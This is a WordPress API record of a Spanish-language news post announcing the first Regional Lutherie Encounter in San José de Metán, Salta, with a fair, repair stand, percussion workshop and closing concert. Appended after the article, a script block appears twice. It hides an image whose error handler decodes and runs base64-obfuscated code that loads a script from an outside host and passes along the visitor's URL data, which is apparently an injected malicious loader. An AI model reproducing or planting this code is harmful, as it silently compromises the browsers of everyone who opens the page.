{"id":4869,"date":"2025-02-20T12:21:06","date_gmt":"2025-02-20T15:21:06","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=4869"},"modified":"2025-08-13T23:40:07","modified_gmt":"2025-08-14T02:40:07","slug":"san-jose-de-metan-sera-sede-del-i-encuentro-regional-de-lutheria","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=4869","title":{"rendered":"San Jos\u00e9 de Met\u00e1n ser\u00e1 sede del I Encuentro Regional de Luther\u00eda"},"content":{"rendered":"\n<h4 class=\"wp-block-heading has-white-color has-text-color has-background has-link-color wp-elements-d18bea52ad339e08781c6fc7c7962c30\" style=\"background-color:#054f7a\"><strong><em>El 22 de febrero, luthiers de la regi\u00f3n sur de la provincia se reunir\u00e1n en Met\u00e1n para exhibir su arte en un encuentro con feria, talleres y un cierre musical especial.<\/em><\/strong><\/h4>\n\n\n\n<p>San Jos\u00e9 de Met\u00e1n ser\u00e1 escenario del Encuentro Regional de Luther\u00eda de la regi\u00f3n sur en Salta, convocando a luthiers de municipios aleda\u00f1os e invitados especiales. El evento se realizar\u00e1 el 22 de febrero en la Casa Natal Federico Gauffin y la plaza principal de 17 a 21:30 h.<\/p>\n\n\n\n<p>El Encuentro Regional de Luther\u00eda de la zona sur de la provincia est\u00e1 impulsado por la Secretar\u00eda de Cultura, junto a la Municipalidad de San Jos\u00e9 de Met\u00e1n para promover el intercambio, realizar un relevamiento y poner en valor el trabajo de destacados y destacadas luthiers de la provincia.<\/p>\n\n\n\n<p>Participar\u00e1n del evento Juan Manuel Garc\u00eda Plasencia, Franco Bernaqui y Juan Luis Arias de Rosario de la Frontera; Eusebio Vidaurre y Juan Alberto Vidaurre de Cobos; Reinaldo Maza Dom\u00ednguez del paraje El Rinc\u00f3n de El Galp\u00f3n; Alejandro Coronel de J. V. Gonz\u00e1lez junto a los invitados especiales Sebasti\u00e1n Villalba de Tartagal y Leandro Pereyra de La Caldera.<\/p>\n\n\n\n<p>En el marco del Encuentro se llevar\u00e1 a cabo la Feria Regional de Luther\u00eda en la Plaza Principal con exposici\u00f3n y venta de instrumentos musicales de realizaci\u00f3n propia. Asimismo, habr\u00e1 un espacio de Consultorio de instrumentos, dedicado a reparaciones menores de instrumentos del p\u00fablico presente.<\/p>\n\n\n\n<p>Por otra parte durante la realizaci\u00f3n de la Feria se brindar\u00e1 un Taller de Percusi\u00f3n a cargo de Cristian Torres en el que se mostrar\u00e1 la sonoridad de los diversos instrumentos de autor. El cierre de la actividad estar\u00e1 a cargo de la prestigiosa cantante Magui Soria acompa\u00f1ada por el guitarrista Gogui Barbosa y m\u00fasicos invitados, utilizando los instrumentos realizados por los y las luthiers participantes.<\/p>\n\n\n\n<p>Cabe destacar que la creaci\u00f3n de instrumentos musicales es una disciplina contemplada en la Ley de 7237 de Protecci\u00f3n a las Manifestaciones Artesanales y a las Artesan\u00edas y posee una rica y amplia trayectoria en distintas regiones de la provincia.<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<p>Fuente:&nbsp;<strong>Secretar\u00eda de Prensa y Comunicaci\u00f3n<\/strong><\/p>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>El 22 de febrero, luthiers de la regi\u00f3n sur de la provincia se reunir\u00e1n en Met\u00e1n para exhibir su arte en un encuentro con feria, talleres y un cierre musical especial. San Jos\u00e9 de Met\u00e1n ser\u00e1 escenario del Encuentro Regional de Luther\u00eda de la regi\u00f3n sur en Salta, convocando a luthiers de municipios aleda\u00f1os e [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":4870,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[14,13],"tags":[],"class_list":{"0":"post-4869","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-anuncios","8":"category-festivales"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/4869"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=4869"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/4869\/revisions"}],"predecessor-version":[{"id":6565,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/4869\/revisions\/6565"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/4870"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=4869"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=4869"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=4869"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}